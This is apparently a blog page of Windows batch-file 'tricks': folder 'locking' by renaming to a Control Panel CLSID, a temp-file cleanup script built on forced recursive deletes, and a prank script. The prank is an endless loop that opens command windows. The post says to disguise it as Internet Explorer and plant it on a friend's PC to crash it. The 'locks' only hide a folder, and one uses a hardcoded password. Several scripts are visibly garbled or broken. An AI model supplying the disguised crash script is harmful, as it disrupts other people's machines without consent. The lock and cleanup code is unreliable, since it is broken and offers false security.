Showing posts with label Command Prompt Tricks. Show all posts
Showing posts with label Command Prompt Tricks. Show all posts

A Simple Coding Trick To Lock ur Folder

Here is the trick to lock these folders without any software...

   
Consider you want to lock a folder named in your E:\, whose path is E:\.
  
Now open the Notepad and type the following

   
ren .{21EC2020-3AEA-1069-A2DD-08002B30309D}
   
Where is your folder name. Save the text file as loc.bat in the same drive.
   
Open another new notepad text file and type the following

   
ren .{21EC2020-3AEA-1069-A2DD-08002B30309D}

   
Save the text file as key.bat in the same drive.
   
Steps to lock the folder:

   
To lock the folder, simply click the loc.bat and it will transform into control panel icon which is inaccessible.
   
To unlock the folder click the key.bat file. Thus the folder will be unlocked and the contents are accessible

   
NOTE: This Doesn't Work On My Computer But My Friends Said That This Work Awesom On There PC's So Try It On Yours Also

Free Up ur PC With A Simple Coding File

Here Is A Trick To Feel Ur PC Like Water.

I'm Kidding How Can u Feel Ur PC like WATER.

Here Is A Simple Trick To Make PC Free Without Any Menu

Simply Copy This Code:

ECHO OFF
CS
:MENU
ECHO.
ECHO ………………………………………..
ECHO PRESS 1 or 2 or 3 or 4 or 5 or 6 to select your task, or 7 to EXIT.
ECHO ………………………………………..
ECHO.
ECHO 1 – DELETE COOKIES
ECHO 2 – DELETE RECENT DOCUMENTS LIST
ECHO 3 – DELETE MY TEMP
ECHO 4 – DELETE MY TEMP INTERNET FILES
ECHO 5 – DELETE SYSTEM TEMP
ECHO 6 – DELETE RECYCLE BIN
ECHO 7 – EXIT
ECHO.
SET /P M=Type 1, 2, 3, 4, 5, 6 or 7 then press ENTER:
IF %M%==1 GOTO DELETE COOKIES
IF %M%==2 GOTO RECENT DOCUMENTS LIST
IF %M%==3 GOTO MY TEMP
IF %M%==4 GOTO MY TEMP INTERNET FILES
IF %M%==5 GOTO SYSTEM TEMP
IF %M%==6 GOTO RECYCLE BIN
IF %M%==7 GOTO EXIT
: DELETE COOKIES (no space between : and D)
del /F /S /Q C:\docume~1\%USERNAME%\cookies\*.*
GOTO MENU
:RECENT DOCUMENTS LIST
del /F /S /Q C:\docume~1\%USERNAME%\recent\*.*
GOTO MENU
:MY TEMP
del /F /S /Q C:\docume~1\%USERNAME%\locals~1\temp\*.*
GOTO MENU
:MY TEMP INTERNET FILES
del /F /S /Q C:\docume~1\%USERNAME%\locals~1\tempor~1\*.*
GOTO MENU
:SYSTEM TEMP
del /F /S /Q %SystemRoot%\temp\*.*
GOTO MENU
:RECYCLE BIN
REM del /F /S /Q C:\recycler\*.*
GOTO MENU

And Save It As FreeUp.bat
 If u Are Having Prblm With It U Can Download A RAR File From HERE

Effect Like Mattrix on Friends PC.

Open Note Pad Then Type The Code Below

Type in Notepad-

@echo off
:a
Start
Start
Start
Start
Start
goto :a


When you save, Go to “File”, “Save As”, and save it as “Internet Explorer.bat”. Where it says “FileType” Select “All Files” or it will not  work!!!

What this will do is Open CMD six times and then repeat itself. Over and Over. You cant stop it. SO DONT TRY IT ON YOUR COMPUTER!!!

Next you need to change the icon to look like “Internet Explorer”.

To do this you need to right click the Icon and go down to “Create Shortcut” and then rename it to “Internet

Explorer”. Then right click it and go down to “Properties” and select “Change Icon”.

Find the Internet Explorer Icon and click it and then click “Apply”.

Put the original Batch File in a random folder on the desktop. So they cant see it.

If you then double click it and it will Crash the computer.


This is very funny to do to friends.

DO NOT ABUSE THIS HACK. FOR EDUCATIONAL PURPOSES ONLY!!!!!!!!
DO NOT START ACCIDENTALLY IF DONE DON'T BLAME ME !!!!!!!!!!!

LOck Your Folder Without Any SOftwarE

Here Is A Notepad Trick Which Help You To Lock Your Folder Easily Without Any Software...

Now The Trick Starts.

1. Open Notepad And Type The Following Code Below======
"
"
\"/

2.
cls
:End
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==0000 goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End


3. Save It As Lockit.bat

4. Open The Lockit.bat

5. It Will Create A Locker Folder Put Your Things In It

When You Lock Your Folder It Will Diappear For A While After Unlock It Will Reappear.

NOTE-
In the above code, don’t forget to edit the line that have your password the above code.
The Default Code Is 0000

if NOT %pass%== 0000 goto FAIL

A Simple Trick to Install Windows XP Fast

Now I'm Going To Show A Tricks That Will Help Those One's Who Install Xp Frequently. XP Takes Around 40 Minutes to Install And By This Tricks u Will Install It in 10-20 Minutes. Follow Some Steps To Do This